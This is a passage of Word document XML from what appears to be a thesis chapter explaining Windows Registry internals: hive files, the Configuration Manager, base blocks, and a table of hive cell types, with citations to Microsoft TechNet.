      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A738C2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> List of </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00A738C2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> hives and their filenames on system disk.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00A738C2" w:rsidRPr="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A738C2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00A738C2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A738C2" w:rsidRDefault="00A738C2" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t>system path variable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “%windir%” links to the path “C:\</w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” in the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> version </w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t>other than NT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and it links to “C:\WinNT\” in </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t xml:space="preserve">NT 4 and </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F102F2">
        <w:t xml:space="preserve"> 2000</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00503832">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00503832">
        <w:t xml:space="preserve"> filename does not have extension, and they cannot be read or write </w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve">by normal computer user (without administrator rights). The </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> path that </w:t>
      </w:r>
      <w:r w:rsidR="004534AE">
        <w:t>is defined as</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> “Volatile hive” does not have any file stored on the system disk, it is just a</w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>image</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> that will be loaded</w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t xml:space="preserve"> to system memory</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> when the system boot</w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve">, and it </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>contents</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t>might be changed every time there is any change made by the system</w:t>
      </w:r>
      <w:r w:rsidR="00A067CE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001C670A">
        <w:t xml:space="preserve">For example, the hive HKEY_LOCAL_MACHINE \HARDWARD, which stores information about physical devices and the </w:t>
      </w:r>
      <w:r w:rsidR="00B9013B">
        <w:t>devices’ resources, is a volatile hive. The resource assignment to the device and the hardware detection occur every time the system boots, so storing this data on disk is not necessary, and this data might be changed every time there is an installation or uninstallation of hardware devices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9013B" w:rsidRDefault="009862B5" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">The heart of the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the HKEY_LOCAL_MACHINE \SYSTEM hive. The subkey \CurrentControlSet\Control which is a node in HKEY_LOCAL_MACHINE \SYSTEM, contains settings that Configuration Manager uses to initialize the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The Configuration Manager </w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve">is a kernel subsystem which is responsible for implementing, initializing, managing and organizing the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1167599604"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00994A2F">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:instrText xml:space="preserve"> CITATION Mic2 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(7)</w:t>
          </w:r>
          <w:r w:rsidR="00994A2F">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve">. To initialize </w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t>, the Configuration Manger locates the hives’ files, creates the root keys</w:t>
      </w:r>
      <w:r w:rsidR="00D14275">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve">then link the hives together for building the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t xml:space="preserve"> structure. To locate the hives’ files, Configuration Manger refers to the value HKEY_LOCAL_MACHINE \SYSTEM \CurrentControlSet \Control \hivelist. A special type of key call “symbolic link” makes it possible for the Configuration Manager to link hives together as well as organize the </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t>. A symbolic link is a key that redirects Configuration Manager t</w:t>
      </w:r>
      <w:r w:rsidR="00AC114D">
        <w:t>o another key. For example, HKEY</w:t>
      </w:r>
      <w:r w:rsidR="00994A2F">
        <w:t>_LOCAL_MACHINE \SAM is a symbolic link to the key at the root of SAM hive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00994A2F" w:rsidRDefault="00994A2F" w:rsidP="00A738C2"/>
    <w:p w:rsidR="00AC114D" w:rsidRPr="00AC114D" w:rsidRDefault="00AC114D" w:rsidP="00A738C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC114D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Hive Structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B9013B" w:rsidRDefault="00AC114D" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">Configuration Manager divides a hive into </w:t>
      </w:r>
      <w:r w:rsidR="00E41963">
        <w:t xml:space="preserve">allocation units called “blocks” in much the same way that system divides a disk into clusters. A Registry block has a size of 4096 bytes (4KB). When a hive </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E41963">
        <w:t>has to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E41963">
        <w:t xml:space="preserve"> expand its size, it will expand the size in block-granular increments. The first block of a hive is called “base block”. </w:t>
      </w:r>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve">In many ways </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D01F87">
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve"> the PE header, the first hive first block contains a magic signature call “regf”, which stands for “Registry File”, for identifying the file as a Registry hive file. The base block also stores information about the timestamp showing the last time a write operation has been initiated on the hive</w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t>, a hive format version number, a checksum, a file’s full name</w:t>
      </w:r>
      <w:r w:rsidR="00D14275">
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t xml:space="preserve">SystemRoot\CONFIG\SAM), </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003B77C9">
        <w:t>an update sequence numbers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003B77C9">
        <w:t>, …</w:t>
      </w:r>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t>The hive format version number indicates the data format within the hive. Hive formats has changed from NT 3.51 to NT 4.0</w:t>
      </w:r>
      <w:r w:rsidR="00D01F87">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B77C9">
        <w:t>since the presence of Windows NT 4.0. Whether we want to load an old NT 3.51 type hive file under a windows operation system which version is higher than Windows NT 4.0, the system will return an error.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F102F2" w:rsidRDefault="00E364D7" w:rsidP="00A738C2">
      <w:r>
        <w:t xml:space="preserve">Since Windows NT, Microsoft has organized the Registry </w:t>
      </w:r>
      <w:r w:rsidR="00D14275">
        <w:t>hive in small containers called “cells”. A cell holds a key, a value, a security descriptor, a list of subkeys or a list of key values. The first field of the cell contains the data’s type. Table 2.3 describes each cell data types in a clear detail.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4384"/>
        <w:gridCol w:w="4386"/>
      </w:tblGrid>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRPr="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRPr="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Data Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Key cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t xml:space="preserve">A cell that contains a Registry key, also called a </w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>key node</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>. A key cell contains a signature (</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>known as “</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>kn</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t xml:space="preserve"> for a key, </w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t>kl</w:t>
            </w:r>
            <w:r w:rsidR="00325EC6">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:t xml:space="preserve"> for a symbolic link), the timestamp of the most recent update to the key, the cell index of the key's parent key cell, the cell index of the sub- key-list cell that identifies the key's subkeys, a cell index for the key's security descriptor cell, a cell index for a string key that </w:t>
            </w:r>
            <w:r w:rsidRPr="00325366">
              <w:lastRenderedPageBreak/>
              <w:t>specifies the class name of the key, and the name of the key (e.g., CurrentControlSet).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:lastRenderedPageBreak/>
              <w:t>Value cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell that contains information about a key's value. This cell includes a signature (kv), the value's type (e.g., REG_DWORD, REG_BINARY), and the value's name (e.g., Boot-Execute). A value cell also contains the cell index of the cell that contains the value's data.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Subkey-list cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell composed of a list of cell indexes for key cells that are all subkeys of a common parent key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Value-list cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00A738C2">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell composed of a list of cell indexes for value cells that are all values of a common parent key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00325366" w:rsidTr="00325366">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00325366">
            <w:pPr>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>Security-descriptor cell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00325366" w:rsidRDefault="00325366" w:rsidP="00325EC6">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00325366">
              <w:t>A cell that contains a security descriptor. Security-descriptor cells include a signature (ks) at the head of the cell and a reference count that records the number of key nodes that share the security descriptor. Multiple key cells can share security-descriptor cells.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00325EC6" w:rsidRPr="00325EC6" w:rsidRDefault="00325EC6" w:rsidP="00325EC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc484886361"/>
      <w:r w:rsidRPr="00325EC6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00B91AB3">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00325EC6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Registry hive cells and their data types.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w:rsidR="00325EC6" w:rsidRPr="00325EC6" w:rsidRDefault="00325EC6" w:rsidP="00325EC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00325EC6">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00325EC6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="00325EC6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 2.</w:t>
      </w:r>
      <w:r w:rsidR="002A12C8">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shows cell data types segments that are contained in the hive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="007634B2">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4916805" cy="2622550"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="6" name="Picture 6" descr="https://technet.microsoft.com/en-us/library/cc750583.inreg01_big(l=e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chnet.microsoft.com/en-us/library/cc750583.inreg01_big(l=en-us).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6805" cy="2622550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="007634B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="240" w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc483834778"/>
      <w:bookmarkStart w:id="39" w:name="_Toc484886342"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00F30840">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cell data type segments in Registry hive.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w:rsidR="007634B2" w:rsidRDefault="007634B2" w:rsidP="007634B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00D02CF9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/cc750583.aspx</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00325EC6" w:rsidRPr="00325EC6" w:rsidRDefault="007634B2" w:rsidP="00325EC6">
      <w:r>
        <w:t xml:space="preserve">A cell’s header is a cell field that specifies the cell’s size. When a cell joins a hive, in case a hive needs more space to store that cell, the system will create an allocation unit call “bin”. </w:t>
      </w:r>
      <w:r w:rsidRPr="007634B2">
